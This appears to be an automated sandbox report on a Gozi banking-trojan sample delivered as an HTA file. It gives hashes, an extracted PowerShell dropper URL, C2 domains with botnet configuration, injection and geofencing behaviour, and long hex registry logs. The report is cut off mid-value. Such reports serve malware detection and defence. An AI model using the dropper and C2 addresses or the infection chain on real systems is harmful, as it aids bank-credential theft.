gozi | 54d0124f0b2197d0b7f6f87024d4e581c7b472eff9f87ecfa93b9a1603410e71

Analysis

max time kernel
155s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
06-10-2023 13:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

client_5.hta
Size

22KB
MD5

988f8a03ac893e41d4f9aaca5addafe1
SHA1

d3bda7e7be11da19cd3adf16a4c58548eb573f74
SHA256

0389108b0322ecbbadd21a245c1b75f93e38a2e51a8b38a385596ebe05c323cf
SHA512

2dd80008e91d35da4d60572be008ab60ae7edd5ebe5b94518c3bfb3aa573c812e2abeb3c7d4033ca9cf5b99e64db5537c79b3e6aae8bd89e894de7fcc2a5b1c1
SSDEEP

384:pA7lUDQMeK43MV0p6WUuJOJjmF9Koq5nZN851z9fwP3jXMeSnqIc6l:H2MWqwRwPDd6l

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

35 1724 powershell.exe

flow	pid	process
35	1724	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

Processes:

DLWwX.exe

pid process

3928 DLWwX.exe

pid	process
3928	DLWwX.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4184 set thread context of 3172	4184	powershell.exe	Explorer.EXE
PID 3172 set thread context of 3700	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 set thread context of 4020	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 set thread context of 3764	3172	Explorer.EXE	cmd.exe
PID 3172 set thread context of 5064	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 set thread context of 412	3172	Explorer.EXE	RuntimeBroker.exe
PID 3764 set thread context of 2184	3764	cmd.exe	PING.EXE
PID 3172 set thread context of 4144	3172	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4680 3928 WerFault.exe DLWwX.exe

pid	pid_target	process	target process
4680	3928	WerFault.exe	DLWwX.exe

Modifies registry class 64 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\afb88584-b854-403c-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\18fed43a-443f-4cc3- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7bc0088eba699b92efa47081b58ef5b52a864bfaa41addce48899aae05b2dfe4"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e0e775b7-7242-42f2- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ad9b39a51576acd4b9e92ed7ccc7ccd6975f5770bd5cf98f21b4f9319b6afa45"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108bd793-d18c-4adb-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108bd793-d18c-4adb- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7792f4289944407802925877beae61e1a1430349320a20df40a4b9755fd71645"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eb62c32f-c5a8-41dd- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008047878d57f8d901e21a1b8e57f8d901e21a1b8e57f8d901568107000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000326539363839363865343261616230396138323234353664376263313732313730363961343238366634636336666365336563343165366133383538396133650000b20009000400efbe4657456a4657456a2e00000000000000000000000000000000000000000000000000b76b5e00320065003900360038003900360038006500340032006100610062003000390061003800320032003400350036006400370062006300310037003200310037003000360039006100340032003800360066003400630063003600660063006500330065006300340031006500360061003300380035003800390061003300650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000298a84171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32653936383936386534326161623039613832323435366437626331373231373036396134323836663463633666636533656334316536613338353839613365000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e02915d9ac9653ee1193597e90c1422bde04d162da5a6511448a0333de6d2491e02915d9ac9653ee1193597e90c1422bdece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\afd013d3-6aca-48a0- = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72502431-5802-4ee3-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1408058b-1968-4ed0- = e017eb8c57f8d901	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1408058b-1968-4ed0- = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0d5b3cc4-23fa-4b6f- = b470c88d57f8d901	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108bd793-d18c-4adb- = af8a038e57f8d901	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eb62c32f-c5a8-41dd- = 6f44448e57f8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eb62c32f-c5a8-41dd- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1f882fe5-5cd8-45f8- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\18fed43a-443f-4cc3- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1408058b-1968-4ed0-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0d5b3cc4-23fa-4b6f-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0b01533a-5b29-44a9- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d737368d57f8d901fbfa788d57f8d901fbfa788d57f8d9012e1407000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000376263303038386562613639396239326566613437303831623538656635623532613836346266616134316164646365343838393961616530356232646665340000b20009000400efbe4657456a4657456a2e000000000000000000000000000000000000000000000000007af48600370062006300300030003800380065006200610036003900390062003900320065006600610034003700300038003100620035003800650066003500620035003200610038003600340062006600610061003400310061006400640063006500340038003800390039006100610065003000350062003200640066006500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000298a84171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37626330303838656261363939623932656661343730383162353865663562353261383634626661613431616464636534383839396161653035623264666534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e02515d9ac9653ee1193597e90c1422bde04d162da5a6511448a0333de6d2491e02515d9ac9653ee1193597e90c1422bdece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69fcfb23-cbdb-45fb-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\afd013d3-6aca-48a0- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1f882fe5-5cd8-45f8-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72502431-5802-4ee3- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7792f4289944407802925877beae61e1a1430349320a20df40a4b9755fd71645"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0d5b3cc4-23fa-4b6f- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000003e88448d57f8d901345e7b8d57f8d901345e7b8d57f8d901573304000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000616439623339613531353736616364346239653932656437636363376363643639373566353737306264356366393866323162346639333139623661666134350000b20009000400efbe4657456a4657456a2e00000000000000000000000000000000000000000000000000b36b7d00610064003900620033003900610035003100350037003600610063006400340062003900650039003200650064003700630063006300370063006300640036003900370035006600350037003700300062006400350063006600390038006600320031006200340066003900330031003900620036006100660061003400350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000298a84171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61643962333961353135373661636434623965393265643763636337636364363937356635373730626435636639386632316234663933313962366166613435000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e02415d9ac9653ee1193597e90c1422bde04d162da5a6511448a0333de6d2491e02415d9ac9653ee1193597e90c1422bdece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5c7144b0-186e-4ca1-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72502431-5802-4ee3- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e0e775b7-7242-42f2-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1408058b-1968-4ed0- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2e968968e42aab09a822456d7bc17217069a4286f4cc6fce3ec41e6a38589a3e"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e0e775b7-7242-42f2- = 3d63cf8c57f8d901	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69fcfb23-cbdb-45fb- = 82aff48d57f8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69fcfb23-cbdb-45fb- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\dcc76c81af0ad9ffc2c7586c21a516a2985690328841290c96684f0a3d9ae160"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\afb88584-b854-403c-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\afb88584-b854-403c- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\18fed43a-443f-4cc3- = e0a9c48c57f8d901	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\18fed43a-443f-4cc3- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000086a0bc8c57f8d90186a0bc8c57f8d90186a0bc8c57f8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000376263303038386562613639396239326566613437303831623538656635623532613836346266616134316164646365343838393961616530356232646665340000b20009000400efbe4657456a4657456a2e000000000000000000000000000000000000000000000000007af48600370062006300300030003800380065006200610036003900390062003900320065006600610034003700300038003100620035003800650066003500620035003200610038003600340062006600610061003400310061006400640063006500340038003800390039006100610065003000350062003200640066006500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000298a84171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37626330303838656261363939623932656661343730383162353865663562353261383634626661613431616464636534383839396161653035623264666534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e01e15d9ac9653ee1193597e90c1422bde04d162da5a6511448a0333de6d2491e01e15d9ac9653ee1193597e90c1422bdece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d00310030003